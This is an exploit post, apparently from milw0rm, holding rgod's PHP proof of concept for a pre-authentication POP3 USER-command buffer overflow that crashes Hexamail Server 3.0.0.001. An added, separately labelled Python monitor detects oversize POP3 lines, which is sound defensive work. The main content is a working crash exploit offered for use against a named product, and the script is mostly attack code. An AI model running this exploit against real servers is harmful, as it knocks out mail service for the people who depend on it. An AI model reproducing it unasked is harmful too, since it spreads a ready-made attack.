Hexamail Server 3.0.0.001 pop3 preauth Remote Overflow PoC by h3m4n

<?php
/*

Hexamail Server 3.0.0.001 (pop3) pre-auth remote overflow poc

by rgod
http://retrogod.altervista.org

tested against the Lite one
this one crashes the entire server
you are in control of eax and ecx,
I think arbitrary code execution is possible
but a little tricky, see you soon ;)

vendor url: http://www.hexamail.com/hexamailserver/

*/

error_reporting(0);
if ($argc<2) {die("[!]Syntax: php $argv[0] [ip]\n");}
echo "[*]Connecting to target host...\n";
// POP3 service on TCP port 110, 5 second connect timeout
$fp=fsockopen($argv[1],110, $errno, $errstr, 5);
if (!$fp) {die("[!]unable to connect ...");}
else {echo "[*]connected...\n";}
// placeholder values for the two registers named in the header comment
$eax="XXXX";
$ecx="YYYY";
// over-long argument for the USER command, sent before any authentication
$bof="./".str_repeat("A",15).$eax.$ecx.str_repeat("A",1025);
$bof = "USER ".$bof."\r\n";
fputs($fp,$bof);
fgets($fp);
fclose($fp);
echo "[*]Sent.\n";
sleep(2);
// reconnect: a refused connection means the service is no longer answering
$fp=fsockopen($argv[1],110, $errno, $errstr, 5);
if (!$fp) {echo "[*]exploit succeeded...\n";}
else {echo "[!]it seems not working...\n";}
?>

# milw0rm.com [2007-08-30]




rgod 08/30/2007
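
Added example, not part of rgod's PoC: a detection-side check for the traffic shape the PoC produces, a POP3 USER line far longer than the protocol allows, sent before authentication. The limits are those of RFC 1939 (40-character arguments) and RFC 2449 (255-octet command lines including CRLF); the class, function and alert names and the sample traffic are assumptions made for this illustration.

```python
# Added example: flag POP3 client lines that exceed the protocol limits.
# RFC 1939 caps each argument at 40 characters; RFC 2449 caps a command
# line at 255 octets including CRLF. Names here are illustrative.
MAX_LINE = 255
MAX_ARG = 40


class Pop3LineMonitor:
    """Reassemble one client-to-server stream and report oversize lines."""

    def __init__(self):
        self.buf = b""
        self.overflowed = False  # discarding the rest of a reported line

    def feed(self, chunk):
        """Add captured bytes; return [(reason, verb, length), ...]."""
        alerts = []
        self.buf += chunk
        while (end := self.buf.find(b"\r\n")) >= 0:
            line, self.buf = self.buf[:end], self.buf[end + 2:]
            if self.overflowed:  # tail of a line already reported
                self.overflowed = False
                continue
            alerts += self._check(line, len(line) + 2)
        # The sender may never terminate the line, so alert as soon as the
        # unterminated data alone passes the limit.
        if not self.overflowed and len(self.buf) > MAX_LINE:
            alerts += self._check(self.buf, len(self.buf))
            self.overflowed = True
        if self.overflowed:
            self.buf = self.buf[-1:]  # keep a possibly split "\r"
        return alerts

    def _check(self, line, length):
        verb, _, rest = line.partition(b" ")
        verb = verb.upper().decode("ascii", "replace")
        if length > MAX_LINE:
            return [("line-too-long", verb, length)]
        if any(len(arg) > MAX_ARG for arg in rest.split(b" ")):
            return [("arg-too-long", verb, length)]
        return []


def demo():
    # Constructed traffic: a normal login, then a 1050-byte USER argument
    # split across two captured segments.
    m = Pop3LineMonitor()
    big = b"USER " + b"B" * 1050 + b"\r\n"
    return m.feed(b"USER alice\r\n") + m.feed(big[:600]) + m.feed(big[600:])
```

The monitor alerts on the first segment that pushes an unterminated line past 255 octets, so it does not depend on the sender ever completing the line.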